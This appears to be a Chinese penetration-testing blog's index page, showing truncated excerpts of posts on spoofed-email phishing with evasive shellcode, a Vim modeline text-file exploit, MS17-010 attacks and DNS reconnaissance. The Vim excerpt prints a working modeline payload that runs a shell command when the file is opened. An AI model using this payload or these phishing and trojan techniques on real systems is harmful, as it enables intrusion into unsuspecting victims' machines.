swaks伪造邮件+免杀shellcode=批量木马上线

swaks伪造邮件+免杀shellcode=批量木马上线

0x00:前言 伪造邮件可以参考文章《伪造任意发件人进行邮件钓鱼》  其实也可以利用这个《利用office宏反弹shell》今天普及新知识点0x01:简介  Swaks是由John Jetmore编写和维护的一种功能强大,灵活,可脚本化,面向事务的SMTP测试工具。可向任意目标发送任意内容的邮件。关于名字 “swaks”这个名字是”SWiss Army Knife Smtp”的首字母缩略词...

渗透测试 2019-06-15 PM 38次 0条
丢给你一个txt并同时获取你shell

丢给你一个txt并同时获取你shell

0x01:复现 1、kali复现桌面新建立一个poc.txt放入以下代码,并用vim执行。代码::!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source! %"):fdl=0:fdt="效果图:成功执行反弹shell脚本新建立一个shell.txt放入以下代码,...

渗透测试 2019-06-15 PM 44次 1条
利用公网Msf+MS17010跨网段攻击内网

利用公网Msf+MS17010跨网段攻击内网

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。一、准备工作1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!!二、反弹一个sh...

渗透测试 2019-06-14 PM 137次 0条
渗透测试之信息收集

渗透测试之信息收集

一、DNS1、A记录 ping nslookup dig 域名 dig -t a baidu.com 2、NS记录(DNS服务器) dig -t NS 域名 3、MX记录(邮件服务器) dig -t MX baidu.com 4、CNAME记录(别名) dig -t CNAME baidu.com 5、whois查询(域名信息查询)whois.ch...

Web安全 2019-06-11 PM 92次 0条